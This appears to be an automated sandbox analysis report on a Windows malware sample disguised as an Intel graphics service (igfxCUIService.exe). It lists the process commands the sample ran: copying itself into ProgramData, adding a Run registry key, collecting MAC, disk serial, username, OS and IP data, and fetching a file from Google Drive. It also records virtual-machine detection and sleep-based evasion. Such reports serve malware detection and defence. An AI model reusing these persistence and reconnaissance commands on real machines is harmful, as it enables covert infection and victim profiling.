Source: global traffic HTTP traffic detected: GET /uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: WinHttpClient Content-Length: 0 Host: drive.google.com
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8gdd9p4c62g2sf2iqkmc81t1u/1641917325000/15598710561884722261/*/1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: WinHttpClient Content-Length: 0 Host: doc-0k-2o-docs.googleusercontent.com
Source: IGFXCUISERVICE.exe, 00000001.00000002.737000999.00000000014EA000.00000004.00000020.sdmp :: Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\getmac.exe :: WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: File created: C:\ProgramData\SystemData\igfxCUIService.exe
Source: IGFXCUISERVICE.exe :: Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\ProgramData\SystemData\igfxCUIService.exe :: Code function: String function: 002B51F0 appears 53 times
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: IGFXCUISERVICE.exe :: Virustotal: Detection: 51%
Source: IGFXCUISERVICE.exe :: Metadefender: Detection: 20%
Source: IGFXCUISERVICE.exe :: ReversingLabs: Detection: 41%
Source: IGFXCUISERVICE.exe :: Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe :: Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown :: Process created: C:\Users\user\Desktop\IGFXCUISERVICE.exe "C:\Users\user\Desktop\IGFXCUISERVICE.exe"
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe :: Process created: C:\ProgramData\SystemData\igfxCUIService.exe "C:\ProgramData\SystemData\igfxCUIService.exe"
Source: C:\ProgramData\SystemData\igfxCUIService.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process created: C:\Windows\SysWOW64\getmac.exe C:\Windows\system32\getmac.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
Source: C:\ProgramData\SystemData\igfxCUIService.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\SystemData\igfxCUIService.exe :: Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic OS get Caption, CSDVersion, OSArchitecture, Version / value
Source: C:\ProgramData\SystemData\igfxCUIService.exe :: Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic nicconfig where 'IPEnabled = True' get ipaddress
Source: C:\ProgramData\SystemData\igfxCUIService.exe :: Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: unknown :: Process created: C:\ProgramData\SystemData\igfxCUIService.exe "C:\ProgramData\SystemData\igfxCUIService.exe"
Source: C:\Windows\System32\conhost.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe :: Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: File created: C:\Users\user\Documents\20220111
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btj2vhwe.osx.ps1
Source: temps1.txt.7.dr :: Binary string: EC-F4-BB-EA-15-88 \Device\Tcpip_{BB556C50-98D0-4585-A1ED-B2838757AE1B}
Source: classification engine :: Classification label: mal92.evad.winEXE@43/21@55/4
Source: C:\ProgramData\SystemData\igfxCUIService.exe :: Code function: 5_2_0029EC90 CoInitialize,CoCreateInstance,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe :: File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_01
Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_01
Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_01
Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4240:120:WilError_01
Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_01
Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_01
Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4100:120:WilError_01
Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5584:120:WilError_01
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe :: Code function: 1_2_012A3FB0 LoadResource,LockResource,SizeofResource,
Source: C:\ProgramData\SystemData\igfxCUIService.exe :: Command line argument: n`-
Source: C:\ProgramData\SystemData\igfxCUIService.exe :: File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder :: Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: IGFXCUISERVICE.exe :: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IGFXCUISERVICE.exe :: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IGFXCUISERVICE.exe :: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IGFXCUISERVICE.exe :: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IGFXCUISERVICE.exe :: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IGFXCUISERVICE.exe :: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: IGFXCUISERVICE.exe :: Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: IGFXCUISERVICE.exe :: Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IGFXCUISERVICE.exe :: Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IGFXCUISERVICE.exe :: Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IGFXCUISERVICE.exe :: Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IGFXCUISERVICE.exe :: Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe :: Code function: 1_2_012E5E0B push ecx; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Code function: 3_2_07A9C277 push cs; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Code function: 3_2_07A9E149 push ss; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Code function: 3_2_07A9BAE9 push cs; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Code function: 3_2_07A9EAE0 push ds; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Code function: 3_2_07A9EAE3 push ds; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Code function: 3_2_07A9B988 push es; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Code function: 3_2_07AFFD28 push eax; mov dword ptr [esp], edx
Source: C:\ProgramData\SystemData\igfxCUIService.exe :: Code function: 5_2_002B5234 push ecx; ret
Source: C:\ProgramData\SystemData\igfxCUIService.exe :: Code function: 5_2_002D5E0B push ecx; ret

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exe :: Process created: reg.exe
Source: C:\Windows\System32\conhost.exe :: Process created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: File created: C:\ProgramData\SystemData\igfxCUIService.exe
Source: C:\Windows\SysWOW64\reg.exe :: Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run igfxCUIService
Source: C:\ProgramData\SystemData\igfxCUIService.exe :: Code function: 5_2_002B60A8 GetModuleHandleW, followed by 41 consecutive GetProcAddress calls
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe :: Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe :: Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\getmac.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT IPAddress FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5788Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6120Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -34365s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -32272s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -33137s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -34610s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -33984s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -31561s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -34548s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 1440Thread sleep time: -510000s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -34573s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -30562s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -32258s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -34400s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -34267s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -32795s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -33723s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -30077s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -31852s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -30644s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -31359s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 5580Thread sleep time: -31944s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6244Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5044Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2944Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5196Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 2740Thread sleep time: -32623s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 6676Thread sleep time: -210000s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 2740Thread sleep time: -32226s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 2740Thread sleep time: -33946s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exe TID: 7040Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\SystemData\igfxCUIService.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\ProgramData\SystemData\igfxCUIService.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\ProgramData\SystemData\igfxCUIService.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1710
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4020
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1882
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1704
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2792
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1495
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeAPI coverage: 8.1 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI coverage: 1.7 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002CB17F FindFirstFileExW,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 34365
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 32272
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 33137
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 34610
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 33984
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 31561
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 34548
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 34573
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 30562
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 32258
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 34400
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 34267
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 32795
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 33723
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 30077
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 31852
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 30644
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 31359
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 31944
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 32623
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 32226
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Thread delayed: delay time: 33946
Source: igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.934965580.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936888635.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926697052.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932777879.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914951380.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919370011.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.924907185.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913311525.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956443217.00000000014B8000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.929400111.00000000014B8000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWg|&
Source: powershell.exe, 00000003.00000003.717158709.0000000004E4F000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.820363609.0000000005221000.00000004.00000001.sdmp | Binary or memory string: Hyper-V
Source: getmac.exe, 00000009.00000002.803585343.0000000000A6D000.00000004.00000001.sdmp, getmac.exe, 00000009.00000003.802570744.0000000000A6A000.00000004.00000001.sdmp, getmac.exe, 00000009.00000003.802525219.0000000000A64000.00000004.00000001.sdmp | Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: igfxCUIService.exe, 00000005.00000003.878492496.0000000001203000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.934965580.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936888635.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926697052.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932777879.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914951380.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919370011.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.924907185.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913311525.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956443217.00000000014B8000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.929400111.00000000014B8000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: getmac.exe, 00000009.00000002.803585343.0000000000A6D000.00000004.00000001.sdmp, getmac.exe, 00000009.00000003.802570744.0000000000A6A000.00000004.00000001.sdmp, getmac.exe, 00000009.00000003.802525219.0000000000A64000.00000004.00000001.sdmp | Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: igfxCUIService.exe, 00000020.00000002.956196667.000000000146D000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW`
Source: powershell.exe, 00000003.00000002.729878512.0000000004843000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.717158709.0000000004E4F000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.820363609.0000000005221000.00000004.00000001.sdmp | Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
